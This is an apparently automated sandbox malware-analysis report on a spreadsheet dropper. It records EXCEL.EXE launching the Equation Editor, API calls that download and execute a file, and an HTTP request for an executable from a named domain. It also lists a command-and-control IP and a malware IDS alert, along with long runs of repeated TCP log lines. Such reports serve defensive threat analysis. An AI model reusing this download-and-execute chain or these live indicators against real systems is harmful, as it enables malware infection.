              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C04C1 ShellExecuteExW,ExitProcess,2_2_035C04C1
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C0460 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C0460
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C04DF ExitProcess,2_2_035C04DF
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C034B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C034B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C0332 ExitProcess,2_2_035C0332
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C03EF URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03EF
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C04AA ShellExecuteExW,ExitProcess,2_2_035C04AA
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035C0367 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C0367
              Source: global traffic | DNS query: name: www.grupodulcemar.pe
              Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 161.132.57.101:443 -> 192.168.2.22:49163

              Networking

              Source: Malware configuration extractorIPs: 192.210.150.26
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: Joe Sandbox ViewIP Address: 192.210.150.26
              Source: Joe Sandbox ViewASN Name: RedCientificaPeruanaPE
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 161.132.57.101:443 -> 192.168.2.22:49163
              Source: global trafficHTTP traffic detected: GET /HKP098767890HJ.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.grupodulcemar.peConnection: Keep-Alive
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A338A6AB.emf
              Source: global trafficHTTP traffic detected: GET /HKP098767890HJ.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.grupodulcemar.peConnection: Keep-Alive
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: www.grupodulcemar.pe
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: outvaunts.exe, 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
